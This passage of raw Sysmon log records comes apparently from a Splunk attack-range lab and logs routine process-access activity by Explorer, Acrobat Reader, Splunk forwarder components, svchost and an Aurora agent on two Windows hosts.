DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.721{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.720{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.720{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.694{FE4C2B44-E64A-63C7-8706-00000000AF02}14003076C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.694{FE4C2B44-E64A-63C7-8706-00000000AF02}14003076C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.546{FE4C2B44-E668-63C7-9706-00000000AF02}26763416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E668-63C7-9706-00000000AF02}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E668-63C7-9706-00000000AF02}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.358{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E668-63C7-9706-00000000AF02}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.236{FE4C2B44-E668-63C7-9706-00000000AF02}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000047727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.233{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D50573463217886FE3B55A4E2E673A,SHA256=1C0776639D69A01009D4BB28179CECDBDE819E16542EBA847AECA8EF5704978C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.126{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000018889Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E669-63C7-4202-00000000B002}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018888Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018887Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018886Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018885Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018884Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018883Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018882Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:33.941{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018881Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 